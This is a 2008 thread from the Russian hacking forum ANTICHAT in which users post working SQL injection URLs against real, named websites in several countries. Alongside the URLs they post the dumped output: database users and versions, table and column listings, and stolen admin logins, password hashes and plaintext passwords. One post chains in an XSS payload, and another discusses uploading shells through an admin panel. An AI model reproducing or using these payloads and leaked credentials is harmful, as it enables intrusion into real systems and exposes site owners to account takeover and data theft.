ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
08.01.2008, 11:38
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
turkystan.kz
Код HTML:
http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,USER(),VERSION(),DATABASE()/*
USER:turkesdb@hosting.isd.kz
VERSION:4.1.22
DATABASE:turkesdb
Код HTML:
http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,concat(ID,0x3a,login,0x3a,password),2,3+from+users/*
Таблица - users
Поля - id,login,password
1:admin:51a71aa84f5e79ad
XSS через SQL)
Код HTML:
http://www.turkystan.kz/page.php?page_id=36&id=-1526+union+select+0,'%3Cscript%3Ealert(/XSS/)%3C/script%3E',2,3+from+users/*
|
|
|
08.01.2008, 13:42
|
|
Banned
Регистрация: 25.12.2006
Сообщений: 179
Провел на форуме:
2337678
Репутация:
354
|
|
www.topwebhosts.org
http://www.topwebhosts.org/directory/view-host.php?id=-66+union+select+1,2,3,concat_ws(0x3A3a,version(),d atabase(),user()),5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27/*
5.0.22::topwebhosts::apache@localhost
|
|
|
|
08.01.2008, 15:00
|
|
Постоянный
Регистрация: 28.09.2007
Сообщений: 820
Провел на форуме:
6722038
Репутация:
1385
|
|
http://www.alexterp.ru/index.php?page=-204+union+select+concat(table_name,0x3a3a3a),2,3,4 +from+information_schema.tables+limit+0,1/*
5.0.45-log
но в базе ничо с пасами не нащёл
----------------------------------------------------------------------
www.travelhit.pl
http://www.travelhit.pl/kontakt/?category=2'+union+select+1,2,concat(login,0x3a,pa sswd),4,5+from+xml_providers/*
5.0.45-community
hermantravel:merLINxLasT
но он никуда не подошёл
есть :
http://www.travelhit.pl/ admin
http://www.travelhit.pl/ cpanel
----------------------------------------------------------------------
http://eurowizja.org/almanach.php?akcja=rocznik&rok=-2001+union+select+1,2,3,table_name,column_name,6,7 ,8,9,0,1,2,3,4,5,6+from+information_schema.columns/*
5.0.45-community
http://eurowizja.org/almanach.php?akcja=rocznik&rok=-2001+union+select+1,2,3,concat_ws(0x3a,login,kod,e mail,gg,cos4),5,6,7,8,9,0,1,2,3,4,5,6+from+members/*
куча всякой дряни на их родном языке ((
----------------------------------------------------------------------
http://www.euro.deal.pl/08_news.php?id=149100+union+select+1,2,3,4,5,6,con cat_ws(0x3a,login,kod,email,gg,cos4),8,9,0,1,2,3,4 ,5,6+from+members/*
5.0.45-community
|
|
|
|
08.01.2008, 16:46
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
Провел на форуме:
3766085
Репутация:
576
|
|
Код:
http://www.compasspoint.org/boardcafe/details.php?id=805+union+select+1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database(),0x71),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
compasspoint@localhost:4.1.11-Debian_4sarge7-log:compasspointq
Код:
http://www.hornets247.com/post.php?id=37007+union+select+1,concat(version(),0x3a,database(),0x3a,user()),3,4,5/*
4.0.27maxlog:hornets247_v4_0:hornets247_v4_0@linho st194.prod.mesa1.secureserver.net
Код:
http://skyscrapernews.com/buildings.php?id=223+order+by+229/*
229 столбцов)))
Последний раз редактировалось v1ru$; 08.01.2008 в 17:45..
|
|
|
|
08.01.2008, 18:03
|
|
Постоянный
Регистрация: 14.05.2006
Сообщений: 334
Провел на форуме:
1543521
Репутация:
272
|
|
http://www.natria.ru/news.php?list=-18+union+select+1,database(),user(),4,version()/*
zarva2@localhost
4.0.18-standard
db_zarva2
ниче выжать не удалось
|
|
|
|
08.01.2008, 19:05
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
Код:
http://www.hogwartsnet.ru/fanf/member.php?id=-1653+union+select+concat_ws(0x2F,version(),id,name,password),2,3,4,5,6,7,8,9+from+u45544_ipbd.ipbd_forums/*
Version 5.0.46 |
|
|
|
08.01.2008, 19:17
|
|
Участник форума
Регистрация: 16.06.2007
Сообщений: 133
Провел на форуме:
1877761
Репутация:
237
|
|
http://team-rs.ru
Код:
http://team-rs.ru/member.php?id=-24+union+select+1,2,3,4,concat_ws(0x2F,id,login,password),6,version(),8,9,10+from+dtool_users/*
Version : 5.0.45-log/u13952@10.10.10.218/u13952
login / password
30VC06T0 / 2A3TFH5A
4YYH6M58 / 5M42I233
|
|
|
|
08.01.2008, 21:04
|
|
Участник форума
Регистрация: 14.08.2007
Сообщений: 150
Провел на форуме:
686641
Репутация:
205
|
|
http://voss.kyrkjer.net/
Код HTML:
http://voss.kyrkjer.net/news.php?news_id=14'+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13/*
4.0.20-standard:voss@localhost:voss
http://www.antonwachterprijs.nl/
Код HTML:
http://www.antonwachterprijs.nl/top1.php?news_id=-21'+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8/*
4.1.22-community-nt:flyingbookmarks@localhost:awp
Последний раз редактировалось ~EviL~; 08.01.2008 в 21:23..
|
|
|
|
08.01.2008, 22:29
|
|
Участник форума
Регистрация: 27.03.2007
Сообщений: 161
Провел на форуме:
1273248
Репутация:
785
|
|
Какой то, самописный наверное, двиг.
В админке есть возможность заливки файлов на сервер. Шеллы палит.
csgn.org
Код HTML:
http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),8,9,10,11,12,13,14,15/*
USER:ahiggins@WEB02.WGA.COM
VERSION:5.0.19-nt
DATABASE:csgn
Код HTML:
http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(id,0x3a,name,0x3a,password)+using+latin1),8,9,10,11,12,13,14,15+from+user/*
Код HTML:
http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(table_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.tables/*
- названия всех таблиц
Код HTML:
http://www.csgn.org/page.php?id=30+union+select+0,1,2,3,4,5,6,convert(concat(column_name)+using+latin1),8,9,10,11,12,13,14,15+from+information_schema.columns/*
- названия всех колонок
Таблица - user
Поля - id,name,password
1:ahiggins:new123 - админ
Раскрутил по полной  |
|
|
|
08.01.2008, 23:00
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
http://www.hr-forum.kz/news.php?id=-10+union+select+1,2,3,concat_ws(0x2f,user(),versio n(),database())/*
hrforumk_root@localhost/4.1.22-standard/hrforumk_hr
-----------------------------------------------------------------------
http://www.alians.kz
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(table_name+using+l atin1),6+from+information_schema.tables/*
Все таблицы...но на страницы поддерживаются не все, так что дольше через limit
http://www.alians.kz/news.php?p=11&id=-60+union+select+1,2,3,4,CONVERT(column_name+using+ latin1),6+from+information_schema.columns+limit+4, 50/*
Все колонки...но на страницы поддерживаются не все, так что дольше через limit
-----------------------------------------------------------------------
http://www.artbox.cz/news.php?id=-17+union+select+1,2,3,4,5,6,7,8,concat(login,char( 58),pass),10+from+users/*
administrator:d41d8cd98f00b204e9800998ecf8427e:<no password>
-----------------------------------------------------------------------
http://etteam.avonet.cz/news.php?id=-88+union+select+1,2,3,4,5,6,7,8,9+from+admin/*
Поля не подобрал((
-----------------------------------------------------------------------
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,table_name+from+information_ schema.tables/*
Все таблицы
http://www.adatio.cz/news.php?id=-12+union+select+1,2,3,column_name+from+information _schema.columns/*
Все колонки
-----------------------------------------------------------------------
http://www.diazivot.cz/news.php?id=-37+union+select+1,2,3,4,5,concat_ws(0x2f,user(),ve rsion(),database()),7,8,9/*
-----------------------------------------------------------------------
http://www.krd.cz/news.php?id=-72+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14/*
-----------------------------------------------------------------------
tyma@localhost/4.1.20-log/tyma
-----------------------------------------------------------------------
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,concat_ws(0x2f,user( ),version(),database())/*
carbon.hotgames.cz@193.86.238.14/5.0.45-log/carbon_hotgames_cz
Все таблицы:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,table_name+from+info rmation_schema.tables/*
Все колонки:
http://carbon.hotgames.cz/news.php?id=-54+union+select+1,2,3,4,5,6,7,column_name+from+inf ormation_schema.columns/*
-----------------------------------------------------------------------
http://www.protocolservice.cz/news.php?id=-1146736800+union+select+1,2,3,4,5,6+from+user/*
Поля не подобрал
-----------------------------------------------------------------------
http://www.hczralocivyskov.cz/news.php?id=35+union+select+1,2,3,concat_ws(0x2f,u ser(),version(),database()),5,6,7,8/*
db4871_hczv@85.93.165.120/4.1.14-Debian_3/db4871_hczv
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?553419){kind=avatar}
![Аватар для K1nD[e]R](/avatars/avatar37752.jpg?553453){kind=avatar}
Линейный вид
